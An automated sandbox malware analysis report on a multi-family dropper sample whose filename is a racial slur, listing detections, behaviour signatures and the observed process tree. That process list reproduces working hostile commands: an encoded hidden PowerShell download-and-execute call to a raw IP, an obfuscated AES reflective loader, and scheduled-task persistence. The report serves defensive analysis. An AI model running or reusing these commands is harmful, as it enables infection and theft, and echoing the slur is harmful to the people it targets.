Malware Analysis Report

2025-01-23 11:45

Sample ID 241204-p9yjgs1nbp
Target niggers.exe
SHA256 c26e2475ef60ba969bb66c9b464b498efb1da0bf7360ff7545c1db3b707bdbed
Tags
ammyyadmin asyncrat flawedammyy lumma metasploit modiloader neshta njrat quasar redline ta505 vidar xmrig xworm af458cf23e4b27326a35871876cc63d9 default office04 sgvp backdoor credential_access defense_evasion discovery evasion execution infostealer miner persistence privilege_escalation pyinstaller rat spyware stealer trojan upx vmprotect
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

c26e2475ef60ba969bb66c9b464b498efb1da0bf7360ff7545c1db3b707bdbed

Threat Level: Known bad

The file niggers.exe was found to be: Known bad.

Malicious Activity Summary

ammyyadmin asyncrat flawedammyy lumma metasploit modiloader neshta njrat quasar redline ta505 vidar xmrig xworm af458cf23e4b27326a35871876cc63d9 default office04 sgvp backdoor credential_access defense_evasion discovery evasion execution infostealer miner persistence privilege_escalation pyinstaller rat spyware stealer trojan upx vmprotect

AmmyyAdmin payload

Asyncrat family

RedLine

Lumma Stealer, LummaC

Njrat family

Vidar

xmrig

TA505

njRAT/Bladabindi

Detect Xworm Payload

Lumma family

Neshta

Xworm family

Detect Vidar Stealer

Quasar family

FlawedAmmyy RAT

Xworm

Ammyy Admin

Flawedammyy family

Modiloader family

Quasar payload

Detect Neshta payload

XMRig Miner payload

Metasploit family

Ta505 family

Ammyyadmin family

ModiLoader, DBatLoader

Redline family

Vidar family

AsyncRat

Xmrig family

MetaSploit

Neshta family

Quasar RAT

RedLine payload

ModiLoader Second Stage

Async RAT payload

Contacts a large (554) amount of remote hosts

Uses browser remote debugging

Modifies Windows Firewall

Stops running service(s)

Sets file to hidden

Command and Scripting Interpreter: PowerShell

Downloads MZ/PE file

Loads dropped DLL

.NET Reactor proctector

Checks computer location settings

VMProtect packed file

Executes dropped EXE

Power Settings

Network Service Discovery

Looks up external IP address via web service

Legitimate hosting services abused for malware hosting/C2

AutoIT Executable

UPX packed file

Launches sc.exe

System Location Discovery: System Language Discovery

Program crash

Event Triggered Execution: Accessibility Features

Detects Pyinstaller

Access Token Manipulation: Create Process with Token

Unsigned PE

System Network Configuration Discovery: Internet Connection Discovery

Enumerates physical storage devices

NSIS installer

Gathers network information

Suspicious use of WriteProcessMemory

Suspicious behavior: EnumeratesProcesses

Scheduled Task/Job: Scheduled Task

Views/modifies file attributes

Kills process with taskkill

Suspicious use of AdjustPrivilegeToken

Opens file in notepad (likely ransom note)

Runs ping.exe

Runs net.exe

Delays execution with timeout.exe

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Reported

2024-12-04 13:02

Signatures

Detects Pyinstaller

pyinstaller
Description Indicator Process Target
N/A N/A N/A N/A

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral2

Detonation Overview

Submitted

2024-12-04 13:02

Reported

2024-12-04 13:05

Platform

win10v2004-20241007-en

Max time kernel

15s

Max time network

161s

Command Line

"C:\Users\Admin\AppData\Local\Temp\niggers.exe"

Signatures

Ammyy Admin

rat ammyyadmin

AmmyyAdmin payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Ammyyadmin family

ammyyadmin

AsyncRat

rat asyncrat

Asyncrat family

asyncrat

Detect Neshta payload

Description Indicator Process Target
N/A N/A N/A N/A

Detect Vidar Stealer

stealer
Description Indicator Process Target
N/A N/A N/A N/A

Detect Xworm Payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

FlawedAmmyy RAT

trojan flawedammyy

Flawedammyy family

flawedammyy

Lumma Stealer, LummaC

stealer lumma

Lumma family

lumma

MetaSploit

trojan backdoor metasploit

Metasploit family

metasploit

ModiLoader, DBatLoader

trojan modiloader

Modiloader family

modiloader

Neshta

persistence spyware neshta

Neshta family

neshta

Njrat family

njrat

Quasar RAT

trojan spyware quasar

Quasar family

quasar

Quasar payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

RedLine

infostealer redline

RedLine payload

Description Indicator Process Target
N/A N/A N/A N/A

Redline family

redline

TA505

ta505

Ta505 family

ta505

Vidar

stealer vidar

Vidar family

vidar

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Xmrig family

xmrig

Xworm

trojan rat xworm

Xworm family

xworm

njRAT/Bladabindi

trojan njrat

xmrig

miner xmrig

Async RAT payload

rat
Description Indicator Process Target
N/A N/A N/A N/A

ModiLoader Second Stage

Description Indicator Process Target
N/A N/A N/A N/A

Contacts a large (554) amount of remote hosts

discovery

Downloads MZ/PE file

Modifies Windows Firewall

evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\netsh.exe N/A
N/A N/A C:\Windows\SysWOW64\netsh.exe N/A

Sets file to hidden

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\attrib.exe N/A

Stops running service(s)

evasion execution

.NET Reactor proctector

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\niggers.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\niggers.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\niggers.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\niggers.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\niggers.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\niggers.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\niggers.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\niggers.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\niggers.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\niggers.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\niggers.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\niggers.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\niggers.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\niggers.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\niggers.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\niggers.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\niggers.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\niggers.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\niggers.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\niggers.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\niggers.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\niggers.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\niggers.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\niggers.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\niggers.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\niggers.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\niggers.exe N/A

VMProtect packed file

vmprotect
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A raw.githubusercontent.com N/A N/A
N/A raw.githubusercontent.com N/A N/A
N/A raw.githubusercontent.com N/A N/A
N/A bitbucket.org N/A N/A
N/A raw.githubusercontent.com N/A N/A
N/A raw.githubusercontent.com N/A N/A
N/A raw.githubusercontent.com N/A N/A
N/A bitbucket.org N/A N/A
N/A raw.githubusercontent.com N/A N/A
N/A raw.githubusercontent.com N/A N/A
N/A raw.githubusercontent.com N/A N/A
N/A raw.githubusercontent.com N/A N/A

Looks up external IP address via web service

Description Indicator Process Target
N/A ip-api.com N/A N/A

Network Service Discovery

discovery
Description Indicator Process Target
N/A N/A C:\Windows\System32\GameBarPresenceWriter.exe N/A

Power Settings

persistence
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\powercfg.exe N/A
N/A N/A C:\Windows\SysWOW64\powercfg.exe N/A
N/A N/A C:\Windows\SysWOW64\powercfg.exe N/A

AutoIT Executable

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Launches sc.exe

Description Indicator Process Target
N/A N/A C:\Windows\system32\sc.exe N/A
N/A N/A C:\Windows\system32\sc.exe N/A

Access Token Manipulation: Create Process with Token

defense_evasion privilege_escalation
Description Indicator Process Target
N/A N/A C:\Windows\system32\mshta.exe N/A

Detects Pyinstaller

pyinstaller
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Enumerates physical storage devices

Event Triggered Execution: Accessibility Features

persistence privilege_escalation

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\Downloads\UrlHausFiles\dsd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\Downloads\UrlHausFiles\AV.scr N/A

System Network Configuration Discovery: Internet Connection Discovery

discovery
Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Roaming\powershell.exe N/A
N/A N/A C:\Users\Admin\Downloads\UrlHausFiles\powershell.exe N/A
N/A N/A C:\Windows\system32\cmd.exe N/A
N/A N/A C:\Windows\system32\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\system32\cmd.exe N/A
N/A N/A C:\Windows\system32\cmd.exe N/A
N/A N/A C:\Windows\system32\PING.EXE N/A
N/A N/A C:\Windows\system32\PING.EXE N/A
N/A N/A C:\Windows\svchost.com N/A

NSIS installer

installer
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Delays execution with timeout.exe

evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\timeout.exe N/A
N/A N/A C:\Windows\SysWOW64\timeout.exe N/A

Gathers network information

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\ipconfig.exe N/A

Kills process with taskkill

evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A

Opens file in notepad (likely ransom note)

ransomware
Description Indicator Process Target
N/A N/A C:\Windows\System32\notepad.exe N/A
N/A N/A C:\Windows\System32\notepad.exe N/A
N/A N/A C:\Windows\System32\notepad.exe N/A

Runs net.exe

Runs ping.exe

Description Indicator Process Target
N/A N/A C:\Windows\system32\PING.EXE N/A
N/A N/A C:\Windows\system32\PING.EXE N/A

Scheduled Task/Job: Scheduled Task

persistence execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\schtasks.exe N/A
N/A N/A C:\Windows\SYSTEM32\schtasks.exe N/A
N/A N/A C:\Windows\SYSTEM32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\Downloads\UrlHausFiles\PowerShell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 3900 wrote to memory of 1040 N/A C:\Users\Admin\AppData\Local\Temp\niggers.exe C:\Users\Admin\AppData\Local\Temp\niggers.exe
PID 3900 wrote to memory of 1040 N/A C:\Users\Admin\AppData\Local\Temp\niggers.exe C:\Users\Admin\AppData\Local\Temp\niggers.exe
PID 1040 wrote to memory of 4700 N/A C:\Users\Admin\AppData\Local\Temp\niggers.exe C:\Windows\system32\cmd.exe
PID 1040 wrote to memory of 4700 N/A C:\Users\Admin\AppData\Local\Temp\niggers.exe C:\Windows\system32\cmd.exe
PID 1040 wrote to memory of 4620 N/A C:\Users\Admin\AppData\Local\Temp\niggers.exe C:\Users\Admin\Downloads\UrlHausFiles\dsd.exe
PID 1040 wrote to memory of 4620 N/A C:\Users\Admin\AppData\Local\Temp\niggers.exe C:\Users\Admin\Downloads\UrlHausFiles\dsd.exe
PID 1040 wrote to memory of 4620 N/A C:\Users\Admin\AppData\Local\Temp\niggers.exe C:\Users\Admin\Downloads\UrlHausFiles\dsd.exe
PID 1040 wrote to memory of 1828 N/A C:\Users\Admin\AppData\Local\Temp\niggers.exe C:\Users\Admin\Downloads\UrlHausFiles\PowerShell.exe
PID 1040 wrote to memory of 1828 N/A C:\Users\Admin\AppData\Local\Temp\niggers.exe C:\Users\Admin\Downloads\UrlHausFiles\PowerShell.exe
PID 4700 wrote to memory of 1916 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4700 wrote to memory of 1916 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1040 wrote to memory of 2440 N/A C:\Users\Admin\AppData\Local\Temp\niggers.exe C:\Users\Admin\Downloads\UrlHausFiles\AV.scr
PID 1040 wrote to memory of 2440 N/A C:\Users\Admin\AppData\Local\Temp\niggers.exe C:\Users\Admin\Downloads\UrlHausFiles\AV.scr
PID 1040 wrote to memory of 2440 N/A C:\Users\Admin\AppData\Local\Temp\niggers.exe C:\Users\Admin\Downloads\UrlHausFiles\AV.scr
PID 1040 wrote to memory of 4176 N/A C:\Users\Admin\AppData\Local\Temp\niggers.exe C:\Users\Admin\Downloads\UrlHausFiles\HRFuUub.exe
PID 1040 wrote to memory of 4176 N/A C:\Users\Admin\AppData\Local\Temp\niggers.exe C:\Users\Admin\Downloads\UrlHausFiles\HRFuUub.exe
PID 1040 wrote to memory of 4176 N/A C:\Users\Admin\AppData\Local\Temp\niggers.exe C:\Users\Admin\Downloads\UrlHausFiles\HRFuUub.exe

Views/modifies file attributes

evasion
Description Indicator Process Target
N/A N/A C:\Windows\SYSTEM32\attrib.exe N/A
N/A N/A C:\Windows\SYSTEM32\attrib.exe N/A
N/A N/A C:\Windows\system32\attrib.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\niggers.exe

"C:\Users\Admin\AppData\Local\Temp\niggers.exe"

C:\Users\Admin\AppData\Local\Temp\niggers.exe

"C:\Users\Admin\AppData\Local\Temp\niggers.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\Downloads\UrlHausFiles\payload1.bat" "

C:\Users\Admin\Downloads\UrlHausFiles\dsd.exe

"C:\Users\Admin\Downloads\UrlHausFiles\dsd.exe"

C:\Users\Admin\Downloads\UrlHausFiles\PowerShell.exe

"C:\Users\Admin\Downloads\UrlHausFiles\PowerShell.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Noninteractive -windowstyle hidden -e UwBlAHQALQBFAHgAZQBjAHUAdABpAG8AbgBQAG8AbABpAGMAeQAgAEIAeQBwAGEAcwBzACAALQBTAGMAbwBwAGUAIABQAHIAbwBjAGUAcwBzACAALQBGAG8AcgBjAGUAOwAgAFsAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAUwBlAHIAdgBlAHIAQwBlAHIAdABpAGYAaQBjAGEAdABlAFYAYQBsAGkAZABhAHQAaQBvAG4AQwBhAGwAbABiAGEAYwBrACAAPQAgAHsAJAB0AHIAdQBlAH0AOwBbAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBTAGUAcgB2AGkAYwBlAFAAbwBpAG4AdABNAGEAbgBhAGcAZQByAF0AOgA6AFMAZQBjAHUAcgBpAHQAeQBQAHIAbwB0AG8AYwBvAGwAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAE4AZQB0AC4AUwBlAHIAdgBpAGMAZQBQAG8AaQBuAHQATQBhAG4AYQBnAGUAcgBdADoAOgBTAGUAYwB1AHIAaQB0AHkAUAByAG8AdABvAGMAbwBsACAALQBiAG8AcgAgADMAMAA3ADIAOwAgAGkAZQB4ACAAKABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAFQARgA4AC4ARwBlAHQAUwB0AHIAaQBuAGcAKABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAKABuAGUAdwAtAG8AYgBqAGUAYwB0ACAAcwB5AHMAdABlAG0ALgBuAGUAdAAuAHcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAcwA6AC8ALwAxADcANgAuADEAMQAxAC4AMQA3ADQALgAxADMAOAAvAHUAcwBlAHIAcwB5AG4AYwAvAHQAcgBhAGQAZQBkAGUAcwBrAC8AXwByAHAAJwApACkAKQApAA==

C:\Users\Admin\Downloads\UrlHausFiles\AV.scr

"C:\Users\Admin\Downloads\UrlHausFiles\AV.scr" /S

C:\Users\Admin\Downloads\UrlHausFiles\HRFuUub.exe

"C:\Users\Admin\Downloads\UrlHausFiles\HRFuUub.exe"

C:\Users\Admin\Downloads\UrlHausFiles\COMSurrogate.exe

"C:\Users\Admin\Downloads\UrlHausFiles\COMSurrogate.exe"

C:\Users\Admin\Downloads\UrlHausFiles\1_encoded.exe

"C:\Users\Admin\Downloads\UrlHausFiles\1_encoded.exe"

C:\Windows\System32\notepad.exe

"C:\Windows\System32\notepad.exe" "C:\Users\Admin\Downloads\UrlHausFiles\26.ps1"

C:\Users\Admin\Downloads\UrlHausFiles\skikda.exe

"C:\Users\Admin\Downloads\UrlHausFiles\skikda.exe"

C:\Users\Admin\Downloads\UrlHausFiles\SearchUII.exe

"C:\Users\Admin\Downloads\UrlHausFiles\SearchUII.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe"

C:\Users\Admin\Downloads\UrlHausFiles\241.exe

"C:\Users\Admin\Downloads\UrlHausFiles\241.exe"

C:\Users\Admin\Downloads\UrlHausFiles\hercules.exe

"C:\Users\Admin\Downloads\UrlHausFiles\hercules.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 536 -p 4176 -ip 4176

C:\Users\Admin\Downloads\UrlHausFiles\241.exe

"C:\Users\Admin\Downloads\UrlHausFiles\241.exe"

C:\Users\Admin\Downloads\UrlHausFiles\ddd.exe

"C:\Users\Admin\Downloads\UrlHausFiles\ddd.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4176 -s 1004

C:\Users\Admin\Downloads\UrlHausFiles\GOLD.exe

"C:\Users\Admin\Downloads\UrlHausFiles\GOLD.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 404 -p 776 -ip 776

C:\Users\Admin\Downloads\UrlHausFiles\shell.exe

"C:\Users\Admin\Downloads\UrlHausFiles\shell.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 776 -s 752

C:\Users\Admin\Downloads\UrlHausFiles\payload.exe

"C:\Users\Admin\Downloads\UrlHausFiles\payload.exe"

C:\Windows\System32\schtasks.exe

"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "PowerShell" /tr "C:\Users\Admin\AppData\Roaming\PowerShell.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\Downloads\UrlHausFiles\1krecrypted.cmd" "

C:\Users\Admin\Downloads\UrlHausFiles\svchost.exe

"C:\Users\Admin\Downloads\UrlHausFiles\svchost.exe"

C:\Users\Admin\Downloads\UrlHausFiles\test28.exe

"C:\Users\Admin\Downloads\UrlHausFiles\test28.exe"

C:\Users\Admin\Downloads\UrlHausFiles\dmshell.exe

"C:\Users\Admin\Downloads\UrlHausFiles\dmshell.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\Admin\Downloads\UrlHausFiles\1krecrypted.cmd';$ddkL='TrhqWFanshqWFfohqWFrmhqWFFihqWFnalhqWFBlhqWFochqWFkhqWF'.Replace('hqWF', ''),'DDPxXecoDPxXmDPxXprDPxXessDPxX'.Replace('DPxX', ''),'MaysmqinysmqMysmqodysmqulysmqeysmq'.Replace('ysmq', ''),'ReiHEpadiHEpLiiHEpnesiHEp'.Replace('iHEp', ''),'GCqdUetCqdUCuCqdUrCqdUreCqdUntPCqdUrCqdUocCqdUesCqdUsCqdU'.Replace('CqdU', ''),'InAKLIvoAKLIkAKLIeAKLI'.Replace('AKLI', ''),'LoJqASadJqAS'.Replace('JqAS', ''),'CopyfqFyTyfqFoyfqF'.Replace('yfqF', ''),'FrvXuAomvXuABvXuAasvXuAe6vXuA4StvXuArvXuAinvXuAgvXuA'.Replace('vXuA', ''),'CxbdihxbdianxbdigxbdieExbdixtexbdinxbdisixbdioxbdinxbdi'.Replace('xbdi', ''),'EleVQPZmeVQPZntVQPZAtVQPZ'.Replace('VQPZ', ''),'CNQbureaNQbutNQbueDNQbuecrNQbuypNQbutorNQbu'.Replace('NQbu', ''),'EoUdqnoUdqtoUdqryoUdqPoUdqoioUdqnoUdqtoUdq'.Replace('oUdq', ''),'ScSRUplcSRUitcSRU'.Replace('cSRU', '');powershell -w hidden;$modules=[System.Diagnostics.Process]::($ddkL[4])().Modules;if ($modules -match 'hmpalert.dll') { exit; };function rInUE($tsSXg){$AjjqB=[System.Security.Cryptography.Aes]::Create();$AjjqB.Mode=[System.Security.Cryptography.CipherMode]::CBC;$AjjqB.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$AjjqB.Key=[System.Convert]::($ddkL[8])('N/y0OKPKBqPZJ+saNe6tgR7TAn10dih8XZ0HebZ+uEc=');$AjjqB.IV=[System.Convert]::($ddkL[8])('Ls3mytPz2eg1HzNec7G7VA==');$BtIij=$AjjqB.($ddkL[11])();$tfdFv=$BtIij.($ddkL[0])($tsSXg,0,$tsSXg.Length);$BtIij.Dispose();$AjjqB.Dispose();$tfdFv;}function UajxO($tsSXg){$coXbk=New-Object System.IO.MemoryStream(,$tsSXg);$PWDcH=New-Object System.IO.MemoryStream;$GMuYT=New-Object System.IO.Compression.GZipStream($coXbk,[IO.Compression.CompressionMode]::($ddkL[1]));$GMuYT.($ddkL[7])($PWDcH);$GMuYT.Dispose();$coXbk.Dispose();$PWDcH.Dispose();$PWDcH.ToArray();}$hqZyL=[System.IO.File]::($ddkL[3])([Console]::Title);$Hvhxu=UajxO (rInUE ([Convert]::($ddkL[8])([System.Linq.Enumerable]::($ddkL[10])($hqZyL, 5).Substring(2))));$LvPZo=UajxO (rInUE ([Convert]::($ddkL[8])([System.Linq.Enumerable]::($ddkL[10])($hqZyL, 6).Substring(2))));[System.Reflection.Assembly]::($ddkL[6])([byte[]]$LvPZo).($ddkL[12]).($ddkL[5])($null,$null);[System.Reflection.Assembly]::($ddkL[6])([byte[]]$Hvhxu).($ddkL[12]).($ddkL[5])($null,$null); "

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

C:\Users\Admin\Downloads\UrlHausFiles\soporte%5Csoporteperfect.exe

"C:\Users\Admin\Downloads\UrlHausFiles\soporte%5Csoporteperfect.exe"

C:\Users\Admin\Downloads\UrlHausFiles\soporte%5Csoporteperfect.exe

"C:\Users\Admin\Downloads\UrlHausFiles\soporte%5Csoporteperfect.exe" -service -lunch

C:\Users\Admin\Downloads\UrlHausFiles\InstallSetup.exe

"C:\Users\Admin\Downloads\UrlHausFiles\InstallSetup.exe"

C:\Users\Admin\Downloads\UrlHausFiles\soporte%5Csoporteperfect.exe

"C:\Users\Admin\Downloads\UrlHausFiles\soporte%5Csoporteperfect.exe"

C:\Users\Admin\Downloads\UrlHausFiles\7rsuHCa.exe

"C:\Users\Admin\Downloads\UrlHausFiles\7rsuHCa.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 416 -p 4376 -ip 4376

C:\Users\Admin\AppData\Roaming\svchost.exe

"C:\Users\Admin\AppData\Roaming\svchost.exe"

C:\Windows\SYSTEM32\cmd.exe

cmd

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4376 -s 568

C:\Users\Admin\Downloads\UrlHausFiles\xxx.exe

"C:\Users\Admin\Downloads\UrlHausFiles\xxx.exe"

C:\Users\Admin\Downloads\UrlHausFiles\downloader.exe

"C:\Users\Admin\Downloads\UrlHausFiles\downloader.exe"

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\blockHost\Ft5ffBENLVBQ0TxN99.vbe"

C:\Users\Admin\AppData\Roaming\PowerShell.exe

C:\Users\Admin\AppData\Roaming\PowerShell.exe

C:\Users\Admin\Downloads\UrlHausFiles\c1.exe

"C:\Users\Admin\Downloads\UrlHausFiles\c1.exe"

C:\Users\Admin\Downloads\UrlHausFiles\AA_v3.exe

"C:\Users\Admin\Downloads\UrlHausFiles\AA_v3.exe"

C:\Users\Admin\Downloads\UrlHausFiles\Registry.exe

"C:\Users\Admin\Downloads\UrlHausFiles\Registry.exe"

C:\Users\Admin\Downloads\UrlHausFiles\winnit.exe

"C:\Users\Admin\Downloads\UrlHausFiles\winnit.exe"

C:\Users\Admin\Downloads\UrlHausFiles\rhnew.exe

"C:\Users\Admin\Downloads\UrlHausFiles\rhnew.exe"

C:\Users\Admin\Downloads\UrlHausFiles\GI59vO6.exe

"C:\Users\Admin\Downloads\UrlHausFiles\GI59vO6.exe"

C:\Users\Admin\Downloads\UrlHausFiles\SGVP%20Client%20Users.exe

"C:\Users\Admin\Downloads\UrlHausFiles\SGVP%20Client%20Users.exe"

C:\Windows\SYSTEM32\schtasks.exe

"schtasks" /create /tn "Runtime Broker" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Runtime Broker.exe" /rl HIGHEST /f

C:\Users\Admin\Downloads\UrlHausFiles\gU8ND0g.exe

"C:\Users\Admin\Downloads\UrlHausFiles\gU8ND0g.exe"

C:\Windows\SYSTEM32\attrib.exe

attrib +H +S C:\Users\Admin\AppData\Roaming\MicrosoftEdgeUpdateTaskMachineCoreSC.exe

C:\Windows\SYSTEM32\attrib.exe

attrib +H C:\Users\Admin\AppData\Roaming\MicrosoftEdgeUpdateTaskMachineCoreSC.exe

C:\Windows\SYSTEM32\schtasks.exe

schtasks /f /CREATE /TN "MicrosoftEdgeUpdateTaskMachineCoreSC" /TR "C:\Users\Admin\AppData\Roaming\MicrosoftEdgeUpdateTaskMachineCoreSC.exe" /SC MINUTE

C:\Users\Admin\Downloads\UrlHausFiles\powershell.exe

powershell ping 127.0.0.1; del gU8ND0g.exe

C:\Users\Admin\Downloads\UrlHausFiles\ClientServices.exe

"C:\Users\Admin\Downloads\UrlHausFiles\ClientServices.exe"

C:\Users\Admin\Downloads\UrlHausFiles\tR7DLnB.exe

"C:\Users\Admin\Downloads\UrlHausFiles\tR7DLnB.exe"

C:\Users\Admin\AppData\Local\Temp\is-SCB84.tmp\ClientServices.tmp

"C:\Users\Admin\AppData\Local\Temp\is-SCB84.tmp\ClientServices.tmp" /SL5="$202F8,965278,203776,C:\Users\Admin\Downloads\UrlHausFiles\ClientServices.exe"

C:\Windows\SysWOW64\cmd.exe

"cmd.exe" /C timeout /T 3 & "C:\Users\Admin\Downloads\UrlHausFiles\ClientServices.exe" /VERYSILENT /SUPPRESSMSGBOXES

C:\Users\Admin\Downloads\UrlHausFiles\AA_v3.5.exe

